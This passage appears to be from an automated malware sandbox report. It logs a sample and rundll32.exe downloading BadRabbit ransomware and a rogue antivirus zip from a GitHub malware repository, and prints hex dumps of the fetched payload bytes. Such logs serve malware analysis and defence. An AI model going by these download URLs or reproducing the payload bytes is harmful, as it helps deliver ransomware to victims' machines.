                                                                                                                                                2022-09-29 12:49:35 UTC7750INData Raw: 6a bb 29 71 a8 35 51 69 eb 58 bc 29 82 5c db d2 1f b2 af 06 e3 c6 79 ee 31 78 75 c6 32 3f 8c f6 44 35 9d 70 46 ac 48 17 60 30 94 88 1d ed f8 1a 08 d4 4b 94 b3 79 07 e6 86 7f 57 84 91 ef b9 14 d7 55 5d a1 f9 94 2f f2 5b f3 7e aa 72 9a d8 14 63 f7 8e 92 bb 85 df 71 2e 44 43 dc 3b d1 88 f5 07 31 67 e1 24 cb f5 24 1c 79 8e 51 95 a5 1f 3e 04 c2 82 ff fe 52 4c 3f 57 d2 d6 ea a6 bc db 97 23 a9 f1 e2 1c bf 81 44 c5 a5 19 3a 4a 4b 37 69 cf 07 ef e9 fd 2d dd e3 4b c7 e2 f3 83 2a 32 d7 c0 81 c1 aa 46 91 ed 3e a2 5e 72 2f ea 75 be 40 0f de 34 53 62 29 9e 3c 60 b0 02 28 b6 39 83 e8 e1 5d bc 34 52 83 a9 a0 6c 99 66 87 a0 f6 12 d1 bb 31 0a 0c 8b 62 c3 de c6 f9 a1 cf b9 64 93 af e9 5d 42 89 29 9a 31 26 2d 80 c9 61 b5 5b cd 27 55 6f e4 c4 05 74 60 bd 71 15 a7 a3 8a 47 09
                                                                                                                                                Data Ascii: j)q5QiX)\y1xu2?D5pFH`0KyWU]/[~rcq.DC;1g$$yQ>RL?W#D:JK7i-K*2F>^r/u@4Sb)<`(9]4Rlf1bd]B)1&-a['Uot`qG
                                                                                                                                                2022-09-29 12:49:35 UTC7766INData Raw: b8 06 87 f0 81 73 f1 5f 8d b2 c4 ef 7c ea 86 ca 02 23 17 e9 e0 44 cf 08 37 96 b8 e4 09 2a 25 32 99 30 8a 90 a2 10 6c 22 ae 5c 4e 9b 53 9f b2 77 79 64 9e 64 bf 87 c9 a5 97 66 7d 8a bc 77 77 fa 0b 6f 6f d8 67 b2 03 f9 a6 58 27 8b 7e 5e 5a a7 91 5a ad 08 c2 67 c8 d0 69 e8 09 99 41 d6 27 00 7c 7e 2b 36 a0 72 b5 10 ed a0 a1 0b 56 43 a4 fc 69 ec 91 69 86 6a ad 33 8e a0 83 01 df 2d b8 33 70 6b f6 44 50 61 b8 2d 68 2e 03 0d f5 12 60 4f d5 fc 10 2a 86 09 0e 5a a6 92 25 7a 37 47 ca ce c5 1a c2 67 63 3c 85 ad a0 fe 78 84 c4 3d 1b d2 3b dd b4 97 a3 3a b9 92 1e 23 4b c8 6c d0 b1 0f 36 59 cb e7 a0 f8 b9 d8 9a 89 5f c4 27 e0 3d fa cd 1e 42 e0 c4 5e d7 0d f1 39 63 ad 05 cc 4a b0 29 e5 b5 c4 f1 55 93 70 26 d5 d9 32 2c 11 fa f1 51 d3 e9 eb a9 6c 16 a7 7c b3 b1 99 90 b7 35
                                                                                                                                                Data Ascii: s_|#D7*%20l"\NSwyddf}wwoogX'~^ZZgiA'|~+6rVCiij3-3pkDPa-h.`O*Z%z7Ggc<x=;:#Kl6Y_'=B^9cJ)Up&2,Ql|5


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                6192.168.2.349686185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:20 UTC183OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                Connection: Keep-Alive


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                60192.168.2.349744140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:37 UTC7779OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                61140.82.121.4443192.168.2.349744C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:37 UTC7779INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:29 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:37 UTC7779INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                62192.168.2.349745185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:37 UTC7781OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                63185.199.108.133443192.168.2.349745C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:37 UTC7781INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1410736
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "245193138e3f9b39cf44c134a58bf8b376783e8722bddc3a8150360e1df811da"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 082B:AB9E:ECAD7E:FC2F3E:6335934D
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:37 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6924-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455778.826701,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: bc8c5bdd290ec98d5b4551b1a94a65f3ed4f2df7
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:54:37 GMT
                                                                                                                                                Source-Age: 276
                                                                                                                                                2022-09-29 12:49:37 UTC7782INData Raw: 50 4b 03 04 14 00 01 00 08 00 07 13 99 43 46 06 5c d7 fa 85 15 00 00 8a 1f 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 2e 65 78 65 c6 7a f1 ff 6f 5f 2b 10 01 9f 9f e1 23 1b 17 e7 90 6d 67 f3 c3 f9 24 f2 59 57 1e ae 47 e5 70 43 6f 74 d3 73 c5 89 ff cc 24 c7 9e c3 ac d7 0a a2 52 de 99 d6 8b 1a 61 86 8b 3a 8a 7f ba a0 aa 63 ff 6c 89 3f a6 2c 72 ef 29 69 ae 9c 49 04 bf f3 7a 15 30 09 32 46 b3 35 83 df 62 92 46 b9 b1 59 06 cd 5d 8b 43 b1 1a 81 70 6f ca af 98 7f 22 13 fe 1d 95 a8 28 7f d5 3e 47 f6 a5 4d 36 8f 22 37 d9 7e 91 94 7d da 95 a4 c0 f6 56 43 62 16 e8 5f 2e 55 e0 4c eb f1 7f 05 c8 09 ee c1 82 9e a9 36 6f a6 d9 d4 c8 95 fa 88 a7 ce 2e 0d d1 9f 23 41 c5 a4 5b 09 88 31 b6 e0 f6 2e ae a8 b9 3d 9e fd 7d 10 72 10 c9 3d 42 20 0c
                                                                                                                                                Data Ascii: PKCF\Endermanch@Antivirus.exezo_+#mg$YWGpCots$Ra:cl?,r)iIz02F5bFY]Cpo"(>GM6"7~}VCb_.UL6o.#A[1.=}r=B
                                                                                                                                                2022-09-29 12:49:37 UTC7798INData Raw: 17 25 69 d2 37 6d 1f a3 b6 00 d2 cf 54 18 a3 7c c6 b6 d5 4b 2e 58 83 7a 70 cd 3f bb 1b 49 bd 8b c8 d3 41 57 ee 49 fc 86 ca 3b 4d e8 26 8a c9 52 c5 40 00 26 bf c2 fd 35 f0 8e 1a b7 10 af b0 ab a6 32 fb 27 18 d3 e8 69 b8 d0 d1 ac 97 01 16 a7 29 8b 91 84 6f ec f0 33 9f 76 e1 1c ac 4e 6f 4a f1 e2 20 94 77 f1 1d 4b 65 66 45 d2 82 0f a2 49 58 e8 66 d6 a5 34 fe 8b e8 a2 17 94 ec 9b 19 3f fc 1e a2 be 29 f4 2c ab 04 7c db cd b3 c4 a5 fd e3 2e 36 71 dc 42 da 62 6b 70 2f 6a 13 7e 2c 42 85 b3 b9 8a 34 7f fe c0 a6 97 3f 33 33 bd b2 da 74 da 62 39 ad 60 07 60 95 14 22 4e 94 b2 68 19 7d 36 b0 3e ab 4b 58 0f 0c 4a 30 02 c5 e4 b0 a6 00 10 4f d8 c1 f3 82 bb 50 db 21 a0 d8 5f 7d 81 0e ca 66 56 38 15 fa 32 f1 f0 f7 96 c9 05 47 45 75 ed 6b b6 b2 96 18 2c 5b e0 cf 73 2a 77 94
                                                                                                                                                Data Ascii: %i7mT|K.Xzp?IAWI;M&R@&52'i)o3vNoJ wKefEIXf4?),|.6qBbkp/j~,B4?33tb9``"Nh}6>KXJ0OP!_}fV82GEuk,[s*w
                                                                                                                                                2022-09-29 12:49:37 UTC7814INData Raw: a6 d1 77 a2 cc 36 24 b5 fe 40 2d 92 69 0b 09 65 b2 57 d7 1a fd b2 f9 29 43 8b cb 2b 78 22 ef 6a ac 7b d6 df f0 d5 24 f4 df 00 6a c3 b6 10 e2 6b 07 87 19 39 f8 08 27 e9 e1 1c 3a 1a 09 64 d0 38 87 af 25 85 37 27 42 d6 b7 b9 87 69 7e 52 86 49 7b 23 63 1a 04 52 bc 99 51 70 b0 34 e4 ab 36 f8 99 92 9a ea b8 b7 44 0d 5b 61 63 fb e8 a8 8b 63 c6 87 aa 16 a3 4f 3f 74 0c 61 5b d5 58 0d 6a 66 4d 45 7f dd 48 ce c3 b2 ea 0a 6c cc b1 a7 98 88 b1 81 85 4f 3d 5c 19 9c 35 a1 39 28 8e 5e 76 7b ae db 0b ee ae ec d2 8c a3 92 c9 f4 17 89 78 9b cc fe 08 ae d4 31 a5 00 45 26 18 3b 7a 09 ea 06 5f f3 c7 05 95 d2 4f 44 63 47 33 d8 9d ad a0 b7 97 53 82 a2 0d 2d 0e 54 70 80 a8 58 cc c5 bf 07 4c 81 20 f0 0d 90 48 e6 dc 79 c2 d1 d3 a0 51 14 a9 92 9b 88 98 3d 51 51 64 bc f9 2e 1b b2 61
                                                                                                                                                Data Ascii: w6$@-ieW)C+x"j{$jk9':d8%7'Bi~RI{#cRQp46D[accO?ta[XjfMEHlO=\59(^v{x1E&;z_ODcG3S-TpXL HyQ=QQd.a
                                                                                                                                                2022-09-29 12:49:37 UTC7830INData Raw: b2 cf 49 c3 6e f0 2f 48 af df 8c 32 59 87 d5 2a db 5d 55 e4 58 8b 37 e4 9d 56 72 a3 13 9b 7c fb 24 62 2f d6 eb 93 f4 b3 fe 57 30 b8 ab 22 24 e4 1b f8 7c 2b 5b 27 a3 e7 86 50 f0 4c fd 84 cf 2f 6f cc ad 99 48 f8 45 a1 e8 f8 ed 68 4d 98 65 c6 5e 67 8b 7f a2 86 da ef b2 43 33 f8 90 56 92 9c a1 62 d4 7a ab 3c 96 45 b3 9c dc 6d fc ca 5c c5 d0 d4 8c 2d 73 5d f2 e7 b5 77 a3 f5 b0 a0 a8 85 66 2c dd bd 95 ea 09 66 4e e8 7b 21 c9 c0 77 0b da d9 22 66 08 8a f2 88 d6 03 19 92 01 c5 a0 37 b1 8f 97 34 55 a9 78 58 61 7d 09 58 8d 9f c6 dd 11 a1 d5 e8 b4 e8 2a f3 4f c7 1e c7 dd 33 25 ce 72 14 72 20 bc be 4a 50 19 16 18 ef 39 40 f0 9a bb 9a 93 73 e0 15 df 2b 04 f0 77 2b a1 b7 f0 e0 a6 ff 63 63 7e 62 92 81 ac 50 73 46 df 38 3d bd 76 1f 76 8e d5 5e 1e 18 57 df 90 93 62 7b f6
                                                                                                                                                Data Ascii: In/H2Y*]UX7Vr|$b/W0"$|+['PL/oHEhMe^gC3Vbz<Em\-s]wf,fN{!w"f74UxXa}X*O3%rr JP9@s+w+cc~bPsF8=vv^Wb{
                                                                                                                                                2022-09-29 12:49:37 UTC7846INData Raw: e9 3f fc a6 db 85 26 dc 10 b8 31 b1 54 72 25 9f 6c b9 e3 54 76 67 9b 54 94 3d ef a1 49 90 cf be fa 2a 9b 7e 71 dc 61 50 05 c6 65 e7 4a 52 73 fd 5a d6 bf b9 02 f4 a4 05 af 47 21 5a 15 cb 26 57 16 93 21 4f ec 65 41 2f 75 57 16 9b d9 a3 6c 32 44 d1 44 cb c1 2a 36 25 30 37 cb ca 91 11 af e3 53 b8 73 42 8c 09 c1 18 78 38 c6 50 90 5e 3b 48 d9 17 f7 ae 3d c6 a8 a1 fd cb 4f 5b 33 a8 67 5e 48 ce f4 70 d6 b0 26 d7 0a 8a 53 ce db 43 83 98 69 4f 93 b9 d4 28 0f 5c b3 fe 11 f8 a4 da d0 f1 eb 70 4f 8b 3f a7 ce 41 ec a2 bf f3 3a 2b 68 74 be 55 ad e6 3e 0d 35 ea e2 64 b1 28 4c 1e 10 e2 52 b2 d9 2f 3b 13 3d 4c 67 0d 8e 70 86 03 b3 67 24 79 8c 92 e3 06 2e ad cd 18 c0 de 47 80 d8 0d 96 c0 b8 28 59 e2 3a 4a ab fd 8d 7b 56 92 0e 88 c3 0e ac 8f 0b 84 d5 be d0 3f 51 f1 04 05 cf
                                                                                                                                                Data Ascii: ?&1Tr%lTvgT=I*~qaPeJRsZG!Z&W!OeA/uWl2DD*6%07SsBx8P^;H=O[3g^Hp&SCiO(\pO?A:+htU>5d(LR/;=Lgpg$y.G(Y:J{V?Q
                                                                                                                                                2022-09-29 12:49:37 UTC7862INData Raw: 7e 50 18 f1 ed 79 ec e3 e3 63 33 43 f2 c8 1e 60 1a 27 5f 6e 6d 39 f8 39 9c 01 61 b9 23 e0 53 e5 ba a8 67 c6 7b 34 18 02 9f eb 1b c6 e4 cd 7c 7e 63 59 04 32 86 00 0f 1d 3f af 4e 57 a1 c0 70 fc 39 05 5d f6 e2 6b 8c 78 2a 0d 0a de 6b 26 a4 da 5c 71 92 f8 0a 3b 5d 10 29 d1 66 01 6e b9 0b 3b 24 90 10 77 51 67 85 b4 c6 8f e5 3c 95 eb 51 59 37 d8 69 cb 1c 95 2e 4e f4 2b fa af d8 65 dc 1a 78 76 c8 b4 7b 7b 2b d9 82 86 dd 32 38 54 a7 03 25 5c 8f 04 3a 23 63 52 23 c1 d6 65 01 da b0 90 a5 e1 b8 90 83 69 7a 4a ac d5 c6 4d fb 66 6e 98 ea 83 66 3f 94 e9 0c 27 cc 58 3e 6d 52 ba 42 1f 7e 5c d5 64 aa 39 f0 aa 54 3f 0b b2 58 86 d8 42 2c 60 3a bd 03 02 79 63 3b 04 60 c4 e3 46 a7 35 4d 5d 35 c9 8f 76 9c ce fc 39 65 e9 40 a2 d4 30 1a 32 4f 8c 2e 17 c5 23 2b 17 db 51 d3 13 a2
                                                                                                                                                Data Ascii: ~Pyc3C`'_nm99a#Sg{4|~cY2?NWp9]kx*k&\q;])fn;$wQg<QY7i.N+exv{{+28T%\:#cR#eizJMfnf?'X>mRB~\d9T?XB,`:yc;`F5M]5v9e@02O.#+Q
                                                                                                                                                2022-09-29 12:49:37 UTC7878INData Raw: ed 2c ac 5d 82 38 2c 1d 97 67 25 31 a6 1b 96 38 c1 4a 3c 32 49 fa 80 60 79 1d 73 a0 6b bd 0d ef 05 bf 2e 3d 5f c4 bf 27 1e 11 04 84 d5 8d b2 32 a3 79 ca 2e df 4a de fa 12 7b 36 1b 57 f6 54 ca d5 b0 c4 5b 09 2f 29 bb 4d 5f 50 1d 21 db 78 ae 2e a1 71 e9 af 85 ba 52 41 1c 47 82 c5 13 22 11 5c 83 66 12 ca dd fc 74 f3 12 5e 4c 16 29 a2 45 37 86 53 05 94 85 6b cc 92 1b 4b c1 80 4a ef 45 2c b4 3b 21 d7 41 86 b1 d9 22 7d c4 59 a1 bd b3 72 4d df e6 d6 13 b0 b5 91 79 e6 f0 60 19 e0 10 b5 2d ce fa 42 4f 90 cf 95 90 88 82 7d 47 fb af 14 8e 62 89 58 fd df 36 8a e5 45 30 99 e6 48 f2 46 5a b5 48 03 f5 5a d9 7e 85 a0 04 5f cf ac b8 43 2d c7 13 98 f2 56 fe cb 20 74 a7 b6 28 52 1c 2f b7 40 7c 41 8c 2a a5 8b 6c 8c c7 6b b3 e5 de 61 44 74 40 58 f5 1a b1 98 14 ac db a8 13 d5
                                                                                                                                                Data Ascii: ,]8,g%18J<2I`ysk.=_'2y.J{6WT[/)M_P!x.qRAG"\ft^L)E7SkKJE,;!A"}YrMy`-BO}GbX6E0HFZHZ~_C-V t(R/@|A*lkaDt@X
                                                                                                                                                2022-09-29 12:49:37 UTC7894INData Raw: cc 9e 4b 3f ea 93 1a 50 81 21 f5 42 c6 83 9d ca 9e 88 52 80 a0 51 99 d8 ad de 9d 07 21 8c 17 ed 94 7d 73 d2 81 39 3d 53 09 9f b5 e8 c4 bb 0d d6 4f 18 3f 93 8b 2c 97 1e 34 1c bb 67 3d 6e c6 ad 50 44 b7 e3 be 7e 3e 00 88 b5 ee 40 11 61 03 d3 d7 78 e8 57 4c d4 b9 7d 33 6f 32 60 0c 1a 10 5c 17 75 48 05 6d 9e b7 98 e7 5e 68 11 ce c5 52 f8 9b 1b 1b c7 17 af 9d bc 45 f5 8e 83 b6 4b 98 3f 63 0f 01 bb 0e 3d 2e 83 59 40 19 c6 3d ef 24 17 f4 62 51 b5 93 d9 0a eb c2 71 94 33 eb 29 23 ce 7c 87 0f 10 19 bc 01 5d c4 18 e0 2f 92 d3 73 bd 66 6b 4d 71 37 7e bd 63 41 36 7e 4f 0f 6a 43 79 ec e8 00 fe eb 0d 87 a1 3f e6 d4 31 4f f6 e5 8c 41 e9 40 c8 cb 09 d3 54 8c 56 d4 d2 ad 61 3e 7e 82 1c 4c 69 74 65 d7 d3 21 f1 53 51 b2 10 92 a6 6a b4 1c fc 7c 97 30 bc bb 3d b1 e3 a6 be 4a
                                                                                                                                                Data Ascii: K?P!BRQ!}s9=SO?,4g=nPD~>@axWL}3o2`\uHm^hREK?c=.Y@=$bQq3)#|]/sfkMq7~cA6~OjCy?1OA@TVa>~Lite!SQj|0=J
                                                                                                                                                2022-09-29 12:49:37 UTC7910INData Raw: 42 96 83 f2 ef 24 9a 23 bd ed 4c 1f f4 d7 a3 86 2d 5e b3 53 83 88 1a 78 a7 0b af 9b 0a 15 e4 30 35 28 65 1e cd 7c 18 58 48 5b d8 8c a0 dd e7 63 c6 e9 27 86 99 cc 86 be b9 a0 81 58 48 48 ce 4c 40 73 af 3b b1 7d 5d f7 bf 6c b3 ce 4b 9d fd 0d 2a 88 c9 9c c6 1b f7 44 5f 4c bc 89 60 44 2c 6d 7d e9 11 29 70 fe 44 20 b0 7e a0 ef 6a 14 7e 4a 1a 62 79 8f 27 b6 c8 11 58 8e 49 d5 59 16 6c 43 ad fe 11 4a 02 c7 a7 ab ed 1e 29 16 33 63 2d db b7 3d 91 43 94 77 da 63 84 97 7f 0f bc 96 ac d1 28 1a b7 3b 88 c7 7f 3a 6c 52 7a 22 a6 3c cd b0 1f cd 8c ea c6 4f 0c dc 05 fb 5f db aa 18 00 5d 21 a2 05 f4 58 8f de ad 02 0e ed 62 83 90 7f 39 40 0a a2 2d 8b 54 77 0b 7e 47 b2 79 06 cd e9 cd 54 6a a0 a9 38 6e 78 55 8a a4 b7 f0 67 e8 8c a1 00 f7 60 c3 c8 dd 45 6a ed 53 80 39 37 a7 47
                                                                                                                                                Data Ascii: B$#L-^Sx05(e|XH[c'XHHL@s;}]lK*D_L`D,m})pD ~j~Jby'XIYlCJ)3c-=Cwc(;:lRz"<O_]!Xb9@-Tw~GyTj8nxUg`EjS97G
                                                                                                                                                2022-09-29 12:49:37 UTC7926INData Raw: f8 b1 20 79 03 f0 41 62 b0 e7 ee 80 e8 1c 9f 41 da 30 5a 65 c7 61 ec 36 3d 57 4d f3 23 76 20 02 8e d2 72 71 ca de f5 9d da 79 34 fb 6f 45 da 8e b4 4a 58 77 9d e3 fb 08 aa 5c 47 e9 dc e1 13 6f 41 a5 34 eb fc 29 d6 5b 24 8a cc ce a8 3d bb c0 c6 57 82 70 dc 63 98 db b9 50 db 7c 09 24 78 9c 2d bb 5b bb 98 7d 5f 27 26 04 b3 bb c8 1b c6 f2 7d 0f 28 06 75 7c 31 ed f2 9a ae e4 4f e6 37 e1 77 6c 1c 50 cf 3c 05 11 3d 77 c3 50 69 17 43 c5 36 7e 0b 12 2e c2 cd 40 ce eb 80 be d7 7d 61 27 06 e1 dc a4 7b 4a 2e cc 39 6f 0f 4d f4 37 1d 10 58 c8 38 d7 ae 71 a5 50 b2 03 7a 3b 6a 56 84 1b 3e 2d 4c 3a e4 90 ea da 8e 66 0d 5a 74 2e 2d 73 72 0f b3 22 8e fa 1a 91 30 0e 67 3a d9 fe 2c a2 f9 8d 19 7f 05 83 f7 6b 54 2a 35 01 98 c1 d0 6f 5c 8c 98 26 29 2c ae 21 ff bb 42 e6 63 18 8a
                                                                                                                                                Data Ascii: yAbA0Zea6=WM#v rqy4oEJXw\GoA4)[$=WpcP|$x-[}_'&}(u|1O7wlP<=wPiC6~.@}a'{J.9oM7X8qPz;jV>-L:fZt.-sr"0g:,kT*5o\&),!Bc
                                                                                                                                                2022-09-29 12:49:37 UTC7942INData Raw: e9 41 c4 c9 43 a0 df 4e 78 06 cb c5 67 89 72 3b af f6 e3 be b0 7a b6 1c 7c 63 e0 69 59 93 7e 56 b5 3b dc e2 18 7c 05 89 e3 9f 68 36 5f c9 29 56 b5 7d cd c1 e1 a2 01 d0 4f de 2a b0 b6 1e 0f 4b 46 b1 d2 f1 39 9c 85 99 a9 8d d9 43 1e 37 1c cb ef bc 99 53 69 d6 3c f7 a6 54 9c 3f 25 9a 76 90 54 15 1e 80 de bb 89 31 ae 40 99 d9 89 f0 da 0b 4b d1 6f 67 fa ae 4c 4f 2f 7f 72 f9 12 0a b2 ad fa aa b2 42 77 87 75 99 bf 39 b6 2c e6 07 4a fc e1 c1 30 90 dd 0b 9f e9 d9 ce ce db 1b a1 e5 ee 4a cd ca ef e8 91 0a 15 c6 a0 bb 23 01 7a 8e ef 4b 8e 51 87 a0 46 46 ec f0 ea 6c 78 62 24 69 1c a2 2e af 51 76 19 c9 57 26 3b 5f e6 b9 49 1a 2f 21 64 fb 0e 87 4b e4 b2 d2 18 b2 59 5f c8 75 13 e8 4a a7 83 bb 75 e1 97 70 7f 0b 1e 06 83 96 2c 42 fc 3d d1 6b d1 19 d8 0e 2d 5e 5b cf 89 99
                                                                                                                                                Data Ascii: ACNxgr;z|ciY~V;|h6_)V}O*KF9C7Si<T?%vT1@KogLO/rBwu9,J0J#zKQFFlxb$i.QvW&;_I/!dKY_uJup,B=k-^[
                                                                                                                                                2022-09-29 12:49:37 UTC7958INData Raw: 1e 2f 5f 54 f0 86 7e cb 29 0e 96 1f 88 49 9d 1e 1a 3e d5 f3 b8 32 9a 2b 49 43 4f c3 a9 c2 69 f3 a2 34 0b c8 51 25 1f 0e 99 d9 35 bd 60 b3 7a 83 a2 4a ce 00 3c 21 ee 24 eb 48 3f 5a a4 88 20 8b 8f 9a 28 a9 e6 c4 6c 8c 55 3c 8d ff e8 72 a0 e0 6f 11 c7 2a e3 69 05 37 86 4c 67 a3 2e 2b f4 56 f0 c9 12 9b 95 5b d4 df 1f 74 14 c8 45 83 f9 f7 ab 14 ec 24 75 31 21 10 5a 59 de aa 58 0d 36 c5 d8 9b 40 f8 0c 00 42 ff 93 81 4d 8b 9e da f9 e6 19 d1 f9 72 8e e9 e6 c5 49 a8 94 a9 4b ab 10 6f 8f 23 d0 c8 36 7f be 4c e4 f5 62 70 b0 b5 05 5a 66 b8 17 21 fa 37 8c eb 48 46 6e af 66 b5 11 5b 9d cd e1 bf 93 f3 bb 68 1e 21 81 49 05 12 36 b0 47 1e 34 2d c6 65 7c 94 13 68 27 60 43 1b 5b ce c6 5a b2 c4 97 86 a5 9b 0d 36 ab 06 08 a0 b0 ac e9 ac 5e 31 1c 16 d9 7c ad f6 26 51 39 a7 ca
                                                                                                                                                Data Ascii: /_T~)I>2+ICOi4Q%5`zJ<!$H?Z (lU<ro*i7Lg.+V[tE$u1!ZYX6@BMrIKo#6LbpZf!7HFnf[h!I6G4-e|h'`C[Z6^1|&Q9
                                                                                                                                                2022-09-29 12:49:37 UTC7974INData Raw: 61 09 c1 f2 79 5a 94 88 e3 10 14 e7 e0 aa 19 9e 07 95 4e 0f e1 1a aa 53 9b 28 63 b5 d6 42 e9 79 0f d3 3c 9b ba f1 b6 29 fd 77 fe 43 bf fa 2d 52 0a 10 d6 14 3d ad 00 1a 2e 59 25 3a f7 a1 38 c3 df 2d a7 f1 e5 34 4a b8 10 96 1e 4d cf 2d f0 44 06 58 53 01 d7 0e 20 8b ca 8b 8b e4 07 23 c2 83 c4 12 f7 37 12 d9 a8 33 c8 e1 ec be 82 45 b7 c0 d4 0c 82 77 86 5f a4 41 11 17 fe 35 8c 90 91 2c 95 96 90 e4 29 c5 e6 11 4c 86 fd c3 ad 2b bc dc 41 f1 cc c1 b2 b1 49 71 a8 57 5a aa 9f af c3 59 39 ef bc 38 ed ac 05 20 9f ee 25 85 e5 d9 f6 66 01 15 67 b0 1d 06 f3 35 19 57 f8 ac 65 0a 8b 47 5d 2d ba 0a 56 08 47 b3 08 71 7d 3f 6f 6c 3e 80 84 06 e3 2b 7a a2 bb 4a 43 ce f7 f4 97 c1 a0 7c 45 a1 6b 7c 90 b2 db 77 8c c9 1e ee 9a df 78 46 16 e0 2a 09 43 af ee 7f ce b7 b2 94 89 10 51
                                                                                                                                                Data Ascii: ayZNS(cBy<)wC-R=.Y%:8-4JM-DXS #73Ew_A5,)L+AIqWZY98 %fg5WeG]-VGq}?ol>+zJC|Ek|wxF*CQ
